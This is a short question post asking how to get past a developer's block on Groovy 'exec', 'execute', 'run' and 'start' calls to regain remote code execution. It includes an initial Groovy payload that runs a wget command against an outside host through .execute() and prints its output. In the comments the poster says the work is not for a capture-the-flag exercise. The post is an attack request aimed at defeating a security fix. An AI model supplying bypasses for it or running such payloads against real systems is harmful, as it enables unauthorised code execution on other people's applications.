# Exploiting Groovy RCE

Tags: appsec, remote-code-execution

I'm trying to exploit groovy engine for RCE. However, the developer fixed by restricting the method calls with name 'exec', 'execute', 'run', 'start'. Is there any bypass or alternative to these methods?

Initial Payload

`def a= 'wget https://example.com/'.execute()\n\na.consumeProcessOutput(sout, serr)\n\na.waitForOrKill(1000)\n\nprintln \"out> $sout err> $serr\"`

Comment: Is this for a CTF?

Comment: No. it is not for a CTF.